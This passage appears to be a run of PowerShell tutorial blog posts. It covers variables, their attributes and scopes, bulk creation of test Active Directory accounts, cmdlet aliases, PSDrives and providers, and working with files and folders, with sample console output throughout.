• User Created – These variables are the ones we create in the shell and in scripts. This variables are present only in the current process we are on and are lost when we close the session. We can create variables in scripts with global, script, or local scope.
• Automatic – These variables keep the state of the PowerShell session and can not be modified directly. The values of this variables change as we execute and use the PowerShell session. This variables will save last run state of cmdlets, commands as well as other objects and information.
• Preference – These variables store user preferences for PowerShell. These variables are created by PowerShell  when a session is started and are populated with default values. We can change the values of these variables. For example, MaximumHistoryCount that sets  the maximum number of entries in the session history.
• Environment – These variables are the variables set by the system for Command and PowerShell environments.

Creating and Accessing Variables

In PowerShell variables behave a bit differently than from what we are used to in other shell environments. We will see that do to the the unique way that PowerShell treats everything as an object variables are treated like so. Variable in PowerShell in reality are units of memory where we store values. Variables start with the symbol $ and followed by a string of letters like:

The string of letters and characters must be continuous and I recommend as a best practice to use descriptive names for the variables, you can use a mix of camel case where each word is capitalized or separate each work with a underscore as the example above.

Variables in PowerShell are not case sensitive and they may contain any letter, number and special character. When special characters are used they need to be enclosed in {}:

PS C:\Users\Carlos\Desktop> ${this is an actual var of var's} = 10
PS C:\Users\Carlos\Desktop> ${this is an actual var of var's}
10

To assign a value to a variable we have 3 methods in PS. The first one is by just setting a name and using the = sign and providing any value we want to set:

We can also use the the New-Variable cmdlet:

As we can see the cmdlet provide us with the largest amount of options. Lets look at the the help for it:

PS C:\Users\Carlos\Desktop> help New-Variable

NAME
    New-Variable

SYNOPSIS
    Creates a new variable.


SYNTAX
    New-Variable [-Name] <string> [[-Value] <Object>] [-Description <string>] [-Force] [-Option {None | ReadOnly | Constant | Private | AllScope}] [-PassThru] [-Scope <string>] [-Visibility {Public |
     Private}] [-Confirm] [-WhatIf] [<CommonParameters>]


DESCRIPTION
    The New-Variable cmdlet creates a new variable in Windows PowerShell. You can assign a value to the variable while creating it or assign or change the value after it is created.

    You can use the parameters of New-Variable to set the properties of the variable (such as those that create read-only or constant variables), set the scope of a variable, and determine whether va
    riables are public or private.

    Typically, you create a new variable by typing the variable name and its value, such as "$var = 3", but you can use the New-Variable cmdlet to use its parameters.


RELATED LINKS
    Online version: http://go.microsoft.com/fwlink/?LinkID=113361
    Get-Variable
    Set-Variable
    Remove-Variable
    Clear-Variable

REMARKS
    To see the examples, type: "get-help New-Variable -examples".
    For more information, type: "get-help New-Variable -detailed".
    For technical information, type: "get-help New-Variable -full".

As we can see it provides a lot of flexibility when creating the variable. The Se-Variable cmdlet can also be used and has a similar list of options as the New-Varibale cmdlet with some slight differences, like the ability to pass the variable content with the –PassThru parameter to the pipe to be consumed by another cmdlet.

When we want to get the value of a variable we can just type the variable name in the shell and hit enter. We can also use the Get-Variable cmdlet:

PS C:\Users\Carlos\Desktop> $var1 = 1
PS C:\Users\Carlos\Desktop> $var1
1
PS C:\Users\Carlos\Desktop> Get-Variable -Name var1
Name                           Value
----                           -----
var1                           1

One thing to keep in mind is that as we covered in previous blog post variables are also available as a PSDrive so we can treat them also as a file system. If we want to get a listing of all variable we would use the Get-Variable cmdlet with no parameters we can also do a Dir of the PSDrive:

PS C:\Users\Carlos\Desktop> dir variable:

Name                           Value
----                           -----
$                              variables:
?                              False
^                              dir
_
args                           {}
ConfirmPreference              High
ConsoleFileName
DebugPreference                SilentlyContinue
Error                          {Cannot find drive. A drive with the name 'variables' does not exist., Cannot find drive. A drive with the name 'variables' does not exist., Cannot find drive. A dri...
ErrorActionPreference          Continue
ErrorView                      NormalView
ExecutionContext               System.Management.Automation.EngineIntrinsics
false                          False
FormatEnumerationLimit         4
HOME                           C:\Users\Carlos
Host                           System.Management.Automation.Internal.Host.InternalHost
input                          System.Collections.ArrayList+ArrayListEnumeratorSimple
LASTEXITCODE                   0
MaximumAliasCount              4096
MaximumDriveCount              4096
MaximumErrorCount              256
MaximumFunctionCount           4096
MaximumHistoryCount            64
MaximumVariableCount           4096
MyInvocation                   System.Management.Automation.InvocationInfo
NestedPromptLevel              0
null
OutputEncoding                 System.Text.ASCIIEncoding
PID                            6648
PROFILE                        C:\Users\Carlos\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1
ProgressPreference             Continue
PSBoundParameters              {}
PSCulture                      en-US
PSEmailServer
PSHOME                         C:\Windows\System32\WindowsPowerShell\v1.0
PSSessionApplicationName       wsman
PSSessionConfigurationName     http://schemas.microsoft.com/powershell/Microsoft.PowerShell
PSSessionOption                System.Management.Automation.Remoting.PSSessionOption
PSUICulture                    en-US
PSVersionTable                 {PSVersion, PSCompatibleVersions, BuildVersion, PSRemotingProtocolVersion...}
PWD                            C:\Users\Carlos\Desktop
ReportErrorShowExceptionClass  0
ReportErrorShowInnerException  0
ReportErrorShowSource          1
ReportErrorShowStackTrace      0
ShellId                        Microsoft.PowerShell
srvs                           {System.ServiceProcess.ServiceController, System.ServiceProcess.ServiceController, System.ServiceProcess.ServiceController, System.ServiceProcess.ServiceController...}
StackTrace                        at System.Management.Automation.PropertyReferenceNode.SetValue(PSObject obj, Object property, Object value, ExecutionContext context)
test                           hello
true                           True
var1                           1.3
var2                           20
VerbosePreference              SilentlyContinue
WarningPreference              Continue
WhatIfPreference               False

To get the contents of a variable when using the PSDrive Method we would use the Get-Content cmdlet just like we would with a file:

PS C:\Users\Carlos\Desktop> Get-Content Variable:\PSHOME 
C:\Windows\System32\WindowsPowerShell\v1.0 

When we want to know what type of value we have in a variable we can use the the .GetType() method and we can get the property of .Name to see the name of the type or use .FullName to get the .Net type.

PS C:\Users\Carlos\Desktop> $var1.GetType().Name 
Int32

PS C:\Users\Carlos\Desktop> get-variable -name var2 | Get-Member
   TypeName: System.Management.Automation.PSVariable

Name         MemberType Definition
----         ---------- ----------
Equals       Method     bool Equals(System.Object obj)
GetHashCode  Method     int GetHashCode()
GetType      Method     type GetType()
IsValidValue Method     bool IsValidValue(System.Object value)
ToString     Method     string ToString()
Attributes   Property   System.Collections.ObjectModel.Collection`1[[System.Attribute, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]] Attributes {get;}
Description  Property   System.String Description {get;set;}
Module       Property   System.Management.Automation.PSModuleInfo Module {get;}
ModuleName   Property   System.String ModuleName {get;}
Name         Property   System.String Name {get;}
Options      Property   System.Management.Automation.ScopedItemOptions Options {get;set;}
Value        Property   System.Object Value {get;set;}
Visibility   Property   System.Management.Automation.SessionStateEntryVisibility Visibility {get;set;}

PS C:\Users\Carlos\Desktop> $srvs = Get-Service
PS C:\Users\Carlos\Desktop> (get-variable srvs).Description = "This variable contains the services objects"
PS C:\Users\Carlos\Desktop> get-variable srvs | select name,description | ft –AutoSize

Name Description
---- -----------
srvs This variable contains the services objects

In PowerShell variables are dynamic. This means that we do not have to declare them and specify a type ahead of use and it can take any value type we want to give it.

PS C:\Users\Carlos\Desktop> $var1 = 1
PS C:\Users\Carlos\Desktop> $var1.GetType().Name
Int32
PS C:\Users\Carlos\Desktop> $var1 = "string"
PS C:\Users\Carlos\Desktop> $var1.GetType().Name
String
PS C:\Users\Carlos\Desktop> $var1 = 1.30
PS C:\Users\Carlos\Desktop> $var1.GetType().Name
Double

Now as mentioned before PowerShell variables can be dynamically typed, but we can also strong type variable by casting them using the variable type:

PS C:\Users\Carlos\Desktop> [int32]$var2 = 10
PS C:\Users\Carlos\Desktop> $var2.GetType().Name
Int32
PS C:\Users\Carlos\Desktop> $var2 = "hello"
Cannot convert value "hello" to type "System.Int32". Error: "Input string was not in a correct format."
At line:1 char:6
+ $var2 <<<<  = "hello"
    + CategoryInfo          : MetadataError: (:) [], ArgumentTransformationMetadataException
    + FullyQualifiedErrorId : RuntimeException

As we can see we got an error when we tried to save a string to the variable. The type is set in the Attribute property of the variable and if we remove the attribute it will become a dynamic variable again.

Variable Options and Attributes

We can also mark variables as read only using the SetVariable cmdlet on existing variables or when creating them with the New-Variable cmdlet:

PS C:\Users\Carlos\Desktop> Set-Variable -Name var2 -Option ReadOnly
PS C:\Users\Carlos\Desktop> $var2 = 20
Cannot overwrite variable var2 because it is read-only or constant.
At line:1 char:6
+ $var2 <<<<  = 20
    + CategoryInfo          : WriteError: (var2:String) [], SessionStateUnauthorizedAccessException
    + FullyQualifiedErrorId : VariableNotWritable

As we can see we could not change the value on a ReadOnly variable by using assignment. But we can change it using the Set-Variable cmdlet and giving it the parameter of –Force:

PS C:\Users\Carlos\Desktop> Set-Variable -Name var2 -Value 20 -Force
PS C:\Users\Carlos\Desktop> $var2
20

If we want an immutable variable we have to create the variable as a Constant. By declaring it as one it can not be deleted, changed nor cleared during the duration of a session.

For clearing a variable we can use the Clear-Variable cmdlet or assign to it the $null value ($null is an Automatic variable created by PowerShell at startup of a session)

PS C:\Users\Carlos\Desktop> $testvar = "hello"
PS C:\Users\Carlos\Desktop> $testvar
hello
PS C:\Users\Carlos\Desktop> Clear-Variable testvar
PS C:\Users\Carlos\Desktop> $testvar
PS C:\Users\Carlos\Desktop>

We can also treat it as file (Child-Item) in a file system in the variables PSDrive:

PS C:\Users\Carlos\Desktop> $testvar = "hello"
PS C:\Users\Carlos\Desktop> Get-Content Variable:\testvar
hello
PS C:\Users\Carlos\Desktop> Set-Content -Value $null -Path Variable:\testvar
PS C:\Users\Carlos\Desktop> Get-Content Variable:\testvar
PS C:\Users\Carlos\Desktop>

We can also use assignment to clear the variable this is done by assigning $null to it:

PS C:\Users\Carlos\Desktop> $var4 = "PS Rocks!"
PS C:\Users\Carlos\Desktop> $var4 = $null
PS C:\Users\Carlos\Desktop> $var4
PS C:\Users\Carlos\Desktop>

To delete a variable we use the Remove-Variable cmdlet and it will be deleted from the current session:

PS C:\Users\Carlos\Desktop> Remove-Variable var4
PS C:\Users\Carlos\Desktop> dir variable:\var*

Name                           Value
----                           -----
var1                           1.3
var2                           20

If a Variable has an option of ReadOnly we can remove it by passing the parameter of –Force to the Remove-Variable cmdlet.

Variables in PowerShell can have several attributes that will control not only the variable type it will accept but other restrictions we might want to impose upon them. Attributes are saved as an Array in the property which allows us to have several attributes assigned to the variable object. Lets look at the attributes of $var2:

# We get the variable object first in to another variable to make it easier to manipulate
PS C:\Users\Carlos\Desktop> $avar = Get-Variable var2
# Lets get members of the variable
PS C:\Users\Carlos\Desktop> $avar | Get-Member
   TypeName: System.Management.Automation.PSVariable

Name         MemberType Definition
----         ---------- ----------
Equals       Method     bool Equals(System.Object obj)
GetHashCode  Method     int GetHashCode()
GetType      Method     type GetType()
IsValidValue Method     bool IsValidValue(System.Object value)
ToString     Method     string ToString()
Attributes   Property   System.Collections.ObjectModel.Collection`1[[System.Attribute, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]] Attributes {get;}
Description  Property   System.String Description {get;set;}
Module       Property   System.Management.Automation.PSModuleInfo Module {get;}
ModuleName   Property   System.String ModuleName {get;}
Name         Property   System.String Name {get;}
Options      Property   System.Management.Automation.ScopedItemOptions Options {get;set;}
Value        Property   System.Object Value {get;set;}
Visibility   Property   System.Management.Automation.SessionStateEntryVisibility Visibility {get;set;}

#Lets get the attribute property
PS C:\Users\Carlos\Desktop> $avar.Attributes
TypeId
------
System.Management.Automation.ArgumentTypeConverterAttribute

The attributes we can set are:

• System.Management.Automation. ValidateSetAttribute – The value may have only a given set of values.
• System.Management.Automation. ValidateRangeAttribute – The value must match a particular number range.
• System.Management.Automation. ValidatePatternAttribute – The value must match a Regular Expression.
• System.Management.Automation.ValidateNotNullOrEmptyAttribute –The value may not be zero or empty ($null).
• System.Management.Automation. ValidateNotNullAttribute – The value may not be zero.
• System.Management.Automation. ValidateLengthAttribute – The value must be in a specified range given a minimum and maximum length.

The attributes must be objects and they are set using the method of Attribute.Add() and we pass as an argument a new object created with the New-Object cmdlet. Lets start by clearing the  attribute for Int types.

PS C:\Users\Carlos\Desktop> $avar.Attributes.Clear()
PS C:\Users\Carlos\Desktop> $avar.Attributes
PS C:\Users\Carlos\Desktop>

Let make a variable only take a Range:

PS C:\Users\Carlos\Desktop>$var2 = 5 PS C:\Users\Carlos\Desktop> $avar.Attributes.Add($(New-Object System.Management.Automation.ValidateRangeAttribute -argumentList 1,20))
PS C:\Users\Carlos\Desktop> $var2 = 1
PS C:\Users\Carlos\Desktop> $var2 = 22
The variable cannot be validated because the value 22 is not a valid value for the var2 variable.
At line:1 char:6
+ $var2 <<<< = 22
+ CategoryInfo : MetadataError: (:) [], ValidationMetadataException
+ FullyQualifiedErrorId : ValidateSetFailure

Lets look now at setting a set of approved values:

PS C:\Users\Carlos\Desktop> $var2 = "yes"
PS C:\Users\Carlos\Desktop> $avar = Get-Variable var2
PS C:\Users\Carlos\Desktop> $avar.Attributes.Add($(New-Object System.Management.Automation.ValidateSetAttribute -argumentList "yes", "no", "y", "n"))
PS C:\Users\Carlos\Desktop> $var2 = "no"
PS C:\Users\Carlos\Desktop> $var2 = "y"
PS C:\Users\Carlos\Desktop> $var2 = "n"
PS C:\Users\Carlos\Desktop> $var2 = "si"
The variable cannot be validated because the value si is not a valid value for the var2 variable.
At line:1 char:6
+ $var2 <<<<  = "si"
    + CategoryInfo          : MetadataError: (:) [], ValidationMetadataException
    + FullyQualifiedErrorId : ValidateSetFailure

Lets set a pattern to match a string starting with a specific string. The pattern should be a regular expression:

PS C:\Users\Carlos\Desktop> $pattern_var = "PS Rocks uhmmm"
PS C:\Users\Carlos\Desktop> $pvar = Get-Variable pattern_var
PS C:\Users\Carlos\Desktop> $pattern = "PS Rocks*"
PS C:\Users\Carlos\Desktop> $pvar.Attributes.Add($(New-Object System.Management.Automation.ValidatePatternAttribute -ArgumentList $pattern))
PS C:\Users\Carlos\Desktop> $pattern_var = "PS Sucks!"
The variable cannot be validated because the value PS Sucks! is not a valid value for the pattern_var variable.
At line:1 char:13
+ $pattern_var <<<< = "PS Sucks!"
+ CategoryInfo : MetadataError: (:) [], ValidationMetadataException
+ FullyQualifiedErrorId : ValidateSetFailure

Lets look at validating a length from 1 to 8:

PS C:\Users\Carlos\Desktop> $length_var = "1234"
PS C:\Users\Carlos\Desktop> $lvar = Get-Variable length_var
PS C:\Users\Carlos\Desktop> $lvar.Attributes.Add($(New-Object System.Management.Automation.ValidateLengthAttribute -ArgumentList 1,8))
PS C:\Users\Carlos\Desktop> $length_var = "Hello I'm longer than 8 chars"
The variable cannot be validated because the value Hello I'm longer than 8 chars is not a valid value for the length_var variable.
At line:1 char:12
+ $length_var <<<< = "Hello I'm longer than 8 chars"
+ CategoryInfo : MetadataError: (:) [], ValidationMetadataException
+ FullyQualifiedErrorId : ValidateSetFailure

For the other attributes of Null and Empty checking we just create the object with no arguments and pass it as an attribute.

Variable Scopes

Just like with any other shell that supports scripting and most modern scripting languages variables will have a scope. Scope is in what parts of a session or script the variable is available to us for use. In PowerShell the scopes are:

• $global – Variables are accessible to scripts, function and to any cmdlet in the current session.
• $script – Variables are only accessible inside the running context of the script and are discarded after the script finishes executing.
• $private – Variables are valid only in the current scope, either a script or a function. They cannot be passed to other scopes.
• $local – Variables are valid only in the current scope of the script or session. All scopes called with them can read, but not change, the contents of the variable and it is the default when creating a variable.

to declare a variable in an scope other than local scope we do it by appending to the beginning of the variable declaration the scope:

# Declaring the variable
PS C:\Users\Carlos\Desktop> $global:gvar = "This is a global variable"
PS C:\Users\Carlos\Desktop> $gvar
This is a global variable
# Using the New-Variable cmdlet
PS C:\Users\Carlos\Desktop> $global:gvar = "This is a global variable"
PS C:\Users\Carlos\Desktop> $gvar
This is a global variable

Automatic Variables

Automatic variables are created and populated when the session is launched. These variables will contain user information, system information, default variables, run time variables and settings for PowerShell. To get a look at the variables and what they do we can either do Get-Help about_Automatic_Variables or list the variables and select only the name and description as shown bellow:

PS C:\Users\Carlos> Get-Variable | select name,description | ft -AutoSize -Wrap
Name                          Description
----                          -----------
$
?                             Execution status of last command.
^
_
args
ConfirmPreference             Dictates when confirmation should be requested. Confirmation is requested when the Confir
                              mImpact of the operation is equal to or greater than $ConfirmPreference. If $ConfirmPrefe
                              rence is None, actions will only be confirmed when Confirm is specified.
ConsoleFileName               Name of the current console file.
DebugPreference               Dictates action taken when an Debug message is delivered.
Error
ErrorActionPreference         Dictates action taken when an Error message is delivered.
ErrorView                     Dictates the view mode to use when displaying errors.
ExecutionContext              The execution objects available to cmdlets.
false                         Boolean False
FormatEnumerationLimit        Dictates the limit of enumeration on formatting IEnumerable objects.
HOME                          Folder containing the current user's profile.
Host                          This is a reference to the host of this Runspace.
input
MaximumAliasCount             The maximum number of aliases allowed in a session.
MaximumDriveCount             The maximum number of drives allowed in a session.
MaximumErrorCount             The maximum number of errors to retain in a session.
MaximumFunctionCount          The maximum number of functions allowed in a session.
MaximumHistoryCount           The maximum number of history objects to retain in a session.
MaximumVariableCount          The maximum number of variables allowed in a session.
MyInvocation
NestedPromptLevel             Dictates what type of prompt should be displayed for the current nesting level.
null                          References to the null variable always return the null value. Assignments have no effect.
OutputEncoding                The text encoding used when piping text to a native executable.
PID                           Current process ID.
PROFILE
ProgressPreference            Dictates action taken when Progress Records are delivered.
PSBoundParameters
PSCulture                     Culture of the current Windows PowerShell Session.
PSEmailServer                 Variable to hold the Email Server. This can be used instead of HostName parameter in Send
                              -MailMessage cmdlet.
PSHOME                        Parent folder of the host application of this Runspace.
PSSessionApplicationName      AppName where the remote connection will be established
PSSessionConfigurationName    Name of the session configuration which will be loaded on the remote computer
PSSessionOption               Default session options for new remote sessions.
PSUICulture                   UI Culture of the current Windows PowerShell Session.
PSVersionTable                Version information for current PowerShell session.
PWD
ReportErrorShowExceptionClass Causes errors to be displayed with a description of the error class.
ReportErrorShowInnerException Causes errors to be displayed with the inner exceptions.
ReportErrorShowSource         Causes errors to be displayed with the source of the error.
ReportErrorShowStackTrace     Causes errors to be displayed with a stack trace.
ShellId                       The ShellID identifies the current shell.  This is used by #Requires.
StackTrace
true                          Boolean True
VerbosePreference             Dictates the action taken when a Verbose message is delivered.
WarningPreference             Dictates the action taken when a Warning message is delivered.
WhatIfPreference              If true, WhatIf is considered to be enabled for all commands.

One of the variables you might find your self using is to check if the last cmdlet you invoked ran successfully or not, the exit state is saved in $? with a value of False if it failed and True if it was successful.

PS C:\Users\Carlos\Desktop> Get-nonexistingcmdlet
The term 'Get-nonexistingcmdlet' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path
is correct and try again.
At line:1 char:22
+ Get-nonexistingcmdlet <<<<
+ CategoryInfo : ObjectNotFound: (Get-nonexistingcmdlet:String) [], CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundException
PS C:\Users\Carlos\Desktop> $?
False
PS C:\Users\Carlos\Desktop> Get-Variable pshome
Name Value
---- -----
PSHOME C:\Windows\System32\WindowsPowerShell\v1.0
PS C:\Users\Carlos\Desktop> $?
True

If we are executing system executable the variable with the last exit code would be $lastexitcode returning the exit code for the error found when executing or 0 if it executed successfully.

PS C:\Users\Carlos\Desktop> wmic systemdrive
systemdrive - Alias not found.
PS C:\Users\Carlos\Desktop> $LASTEXITCODE
44135
PS C:\Users\Carlos\Desktop> hostname
infidel01
PS C:\Users\Carlos\Desktop> $LASTEXITCODE
0

Some of the automatic variables can be changed so as to customize the session, others are read only and others are modified by the session it self as it executes. Many of these variable will prove useful as you work with PowerShell so I invite you to read the help on automatic variables.

Conclusion

I only covered some of the main points of variables and how to work with them. I do invite you to read more about them in the internal documentation that Microsoft PowerShell provides using the Get-Help cmdlet:

• about_Variables
• about_Automatic_Variables
• about_Environment_Variables
• about_Preference_Variables
• about_Scopes

As always I hope you find this blog post useful and informative.

After installing the Active Directory Service and making the changes to DNS so it would forward to the proper DNS and made sure I had a Reverse Lookup Zone I wanted to create 100 test domain accounts. I normally use cmd.exe with dsadd.exe command, but this time I wanted to do it using PowerShell and this is with what I came up with as a command:

  1: import-module activedirectory
  2: (1..100) | foreach {New-ADUser -SamAccountName "User$($_.tostring())" -Name "User$($_.tostring())" -DisplayName "User$($_.tostring())" -AccountPassword (ConvertTo-SecureString -AsPlainText "P@ssword$($_.tostring())" -Force) -Enabled $true -EmailAddress "user$($_.tostring())@acmelabs.com" }

The commands are broken as so:

• On line 1 I import the Active Directory PowerShell Module on the DC. If you want to see the cmdlets available on this module you can run  Get-Command -Module activedirectory this will list all of the cmdlets available to us to manage Active Directory.
• On line 1 I generated a range from 1 to 100 and piped it to the cmdlet ForEach-Object and gave I a code block to run the cmdlet New-ADUser. To get more info on this cmdlet I invite you to run Get-Help New-ADUser –Full this will give you the full help plus examples of the cmdlet. Since the default variable of each object processed by the pipe is $_ and in the case of a range what I’m getting are Int32 objects I need to use the method of .ToString() to convert them to string and I use $() inside a double quoted string to expand the variable. What I do for each user I created was:
• Set a Name
• Set a Display Name
• Set SAM Account Name
• Set the Password. Now the cmdlet requires a secure string as value for the parameter, for this I used the ConvertTo-SecureString cmdlet to generate one from a plaintext quoted string.
• Enable the account and set an email address since I will be installing Exchange later in this environment.

I do hope you find this useful and informative as always.

PS C:\> Get-Alias | where {$_.definition -match "path|item|content|location"} | Group-Object definition

Count Name                      Group
----- ----                      -----
    1 Add-Content               {ac}
    3 Get-Content               {cat, gc, type}
    3 Set-Location              {cd, chdir, sl}
    1 Clear-Content             {clc}
    1 Clear-Item                {cli}
    1 Clear-ItemProperty        {clp}
    3 Copy-Item                 {copy, cp, cpi}
    1 Copy-ItemProperty         {cpp}
    1 Convert-Path              {cvpa}
    6 Remove-Item               {del, erase, rd, ri...}
    3 Get-ChildItem             {dir, gci, ls}
    1 Get-Item                  {gi}
    2 Get-Location              {gl, pwd}
    1 Get-ItemProperty          {gp}
    1 Invoke-Item               {ii}
    3 Move-Item                 {mi, move, mv}
    1 Move-ItemProperty         {mp}
    1 New-Item                  {ni}
    1 Pop-Location              {popd}
    1 Push-Location             {pushd}
    2 Rename-Item               {ren, rni}
    1 Rename-ItemProperty       {rnp}
    1 Remove-ItemProperty       {rp}
    1 Resolve-Path              {rvpa}
    1 Set-Content               {sc}
    1 Set-Item                  {si}
    1 Set-ItemProperty          {sp}

As we can see in addition to the commands that we know from Unix type systems and those we use from cmd.exe we can find that PowerShell provides even more aliases for those cmdlets and for other actions we will discuss we will see that it has it’s own aliases and cmdlets.

PSDrives

Lets start with the concept that PowerShell treats files and folders as Items, the reason for this is that PowerShell treats other structure data as a file systems and calls the mappings to them PSDrives. To list the PSDrives on our current system we use the cmdlet Get-PSDive:

PS C:\> Get-PSDrive | ft -AutoSize

Name     Used (GB) Free (GB) Provider    Root               CurrentLocation
----     --------- --------- --------    ----               ---------------
Alias                        Alias
C            60.13    535.94 FileSystem  C:\
cert                         Certificate \
D           764.70    166.81 FileSystem  D:\
E           617.89    313.62 FileSystem  E:\
Env                          Environment
F                            FileSystem  F:\
Function                     Function
G                            FileSystem  G:\
H                            FileSystem  H:\
HKCU                         Registry    HKEY_CURRENT_USER
HKLM                         Registry    HKEY_LOCAL_MACHINE
I                            FileSystem  I:\
J                            FileSystem  J:\
Variable                     Variable
WSMan                        WSMan

As we can see in addition to the normal drives we have on the system we have others drives we can navigate to:

• Alias – Represent all aliases valid for the current PowerShell Session.
• Cert – Certificate store for the user represented in Current Location.
• Env – All environment variables for the current PowerShell Session.
• Function - All functions available for the current PowerShell Session.
• HKLM - Registry HKey Local Machine Registry Hive.
• HKCU - Registry HKey Current User Hive for the user the PowerShell session is running as.
• WSMan - WinRM (Windows Remote Management) configuration and credentials.

Each of these PowerShell Drives are dependent on what is called PowerShell Providers that allow the access to the structured information. These can be listed with the Get-PSProvider cmndlet:

PS C:\> Get-PSProvider | ft -AutoSize

Name        Capabilities                Drives
----        ------------                ------
WSMan       Credentials                 {WSMan}
Alias       ShouldProcess               {Alias}
Environment ShouldProcess               {Env}
FileSystem  Filter, ShouldProcess       {C, D, E, F...}
Function    ShouldProcess               {Function}
Registry    ShouldProcess, Transactions {HKLM, HKCU}
Variable    ShouldProcess               {Variable}
Certificate ShouldProcess               {cert}

As we can see there are provider for other types other than FileSystem, this can me extended depending on PowerShell modules loaded and installed on a system for example on Windows 7 systems with the Remote Administration Tools or Windows 2008 R2 Domain Controller the can have access to an Active Directory provider, machines with the VMware PowerCLI installed will have access to providers for VMware Datastore and Virtual Infrastructures:

PowerCLI C:\> Get-PSProvider

Name                 Capabilities                  Drives
----                 ------------                  ------
WSMan                Credentials                   {WSMan}
Alias                ShouldProcess                 {Alias}
Environment          ShouldProcess                 {Env}
FileSystem           Filter, ShouldProcess         {C, A, D}
Function             ShouldProcess                 {Function}
Registry             ShouldProcess, Transactions   {HKLM, HKCU}
Variable             ShouldProcess                 {Variable}
Certificate          ShouldProcess                 {cert}
VimDatastore         ShouldProcess                 {vmstores, vmstore}
VimInventory         Filter                        {vis, vi}

Using one of this providers is quite simple, for it we use the New-PSDrive cmdlet, options for the cmdlet may change depending on the provider used so if using any external provide do look at the documentation provided by the company that made the provider. Each provider has different capabilities and this capabilities dictate what can be done on the data that is accessed, for example:

• ShouldProcess - Cmdlets that support the -Confirm and -WhatIf parameter can be used against the PSDrive.
• Credentials - Cmdlets that use the -Credential parameter can be used against the PSDrive
• Transactions - Cmdlets can me executed in a transactional fashion and use the parameter -UseTransaction against the PSDrive.
• Filter - Cmdlets can use wildcard filtering for enumerating objects using the -Filter parameter against the PSDrive.

Lets map a drive:

PS C:\Users\carlos> New-PSDrive -Name isostore -Root \\192.168.1.2\isostore -PSProvider filesystem

Name           Used (GB)     Free (GB) Provider      Root                      CurrentLocation
----           ---------     --------- --------      ----                      ---------------
isostore                               FileSystem    \\192.168.1.2\isostore

PS C:\Users\carlos> ls isostore:


    Directory: \\192.168.1.2\isostore


Mode                LastWriteTime     Length Name
----                -------------     ------ ----
da---         1/26/2012  12:49 PM            Oracle
da---         3/27/2012   1:11 PM            Microsoft
da---         3/15/2012   7:34 PM            Linux
da---        12/30/2011   3:49 PM            FreeBSD
da---         3/15/2012   7:33 PM            Solaris
d----         12/2/2011  11:29 AM            unlock-all-v102
da---         3/15/2012   7:34 PM            VMWare
da---         2/27/2012   8:04 AM            Apple
-a---         2/24/2012   9:51 PM 3589316608 8250.0.WINMAIN_WIN8BETA.120217-1520_X64FRE_SERVER_EN-US-HB1_SSS_X64FRE_EN-
                                             US_DV5.ISO
-a---          1/4/2012   2:06 PM        403 shutdown_vms.rb
-a---         4/13/2011   3:17 AM  531705856 openfileresa-2.99.1-x86_64-disc1.iso
-a---         10/8/2007   4:06 PM  661127168 win2k3entsp2.iso
-a---        12/30/2011   7:32 PM  115838976 pfSense.iso
-a---          1/2/2012  11:16 PM  533204992 XenServer-6.0.0-install-cd.iso
-a---          1/4/2012   1:50 PM        177 shtdown.sh
-a---          5/4/2011   5:42 PM  369717248 VMware-VMvisor-Installer-4.0.0.Update01-208167.x86_64.iso

One thing that we need to keep in mind is that the drives we create are only present in the current PowerShell Session only and only can be accessed by the session so Windows Explorer and other tools on windows will not have access to the drive. Also as we can see in the example we can use a longer name for the drive than the letters we are used to use on Windows when mapping drives.

Working with Items

Listing Items

Lets look first at listing the contents of the current working folder for this we will use the Get-ChildItem cmdlet:

PS C:\> Get-ChildItem


    Directory: C:\


Mode                LastWriteTime     Length Name
----                -------------     ------ ----
d----         7/13/2009  11:20 PM            PerfLogs
d-r--          4/5/2012  10:27 PM            Program Files
d-r--          4/8/2012   6:39 PM            Program Files (x86)
d----          4/5/2012   7:42 PM            Python27
d----          4/5/2012   7:41 PM            Python32
d----          4/5/2012   7:38 PM            Ruby193
d----          4/6/2012  12:27 PM            SysinternalsSuite
d-r--          4/5/2012  10:54 PM            Users
d----          4/8/2012  11:14 AM            Windows
-a---          4/5/2012  10:32 PM       1024 .rnd

As we can see we get a listing of the files and folders and basic information about them. Each item is in fact a .Net object of System.IO.FileInfo type that we can manipulate. Lets try searching in a given path for a file that matches a wild card, as we saw before when talink about PSProviders the FileSystem provider allows for filtering. Lets search for any file that starts with telnet in my install of Ruby 1.9.3:

PS C:\> Get-ChildItem -Path .\Ruby193 -Recurse -Filter telnet*


    Directory: C:\Ruby193\lib\ruby\1.9.1\net


Mode                LastWriteTime     Length Name
----                -------------     ------ ----
-a---         5/18/2011   9:07 PM      32598 telnet.rb

Creating Files and Folders

Lets crate a directory and file for us to use to keep exploring the cmdlets, lets start by using the New-Item cmdlet to create a folder called testfolder:

PS C:\> New-Item -Path . -Name testfolder -ItemType "directory"


    Directory: C:\


Mode                LastWriteTime     Length Name
----                -------------     ------ ----
d----          4/9/2012  11:45 AM            testfolder

As with all cmdlets I mention on the blog posts I do recommend that you look at full help of the command and look at the members of the objects returned as covered in the initial blogposts.

Now lets create a file, for this we will use the ItemType of "file" to indicate we want a file.

PS C:\> New-Item -Path .\testfolder -Name testfile -ItemType "file"


    Directory: C:\testfolder


Mode                LastWriteTime     Length Name
----                -------------     ------ ----
-a---          4/9/2012  11:53 AM          0 testfile

Working with Items

Now that we have a file we can work with lets look at the properties and methods available with the Get-Item cmdlet:

PS C:\> Get-Item -Path .\testfolder\testfile | Get-Member


   TypeName: System.IO.FileInfo

Name                      MemberType     Definition
----                      ----------     ----------
Mode                      CodeProperty   System.String Mode{get=Mode;}
AppendText                Method         System.IO.StreamWriter AppendText()
CopyTo                    Method         System.IO.FileInfo CopyTo(string destFileName), System.IO.FileInfo CopyTo(s...
Create                    Method         System.IO.FileStream Create()
CreateObjRef              Method         System.Runtime.Remoting.ObjRef CreateObjRef(type requestedType)
CreateText                Method         System.IO.StreamWriter CreateText()
Decrypt                   Method         System.Void Decrypt()
Delete                    Method         System.Void Delete()
Encrypt                   Method         System.Void Encrypt()
Equals                    Method         bool Equals(System.Object obj)
GetAccessControl          Method         System.Security.AccessControl.FileSecurity GetAccessControl(), System.Secur...
GetHashCode               Method         int GetHashCode()
GetLifetimeService        Method         System.Object GetLifetimeService()
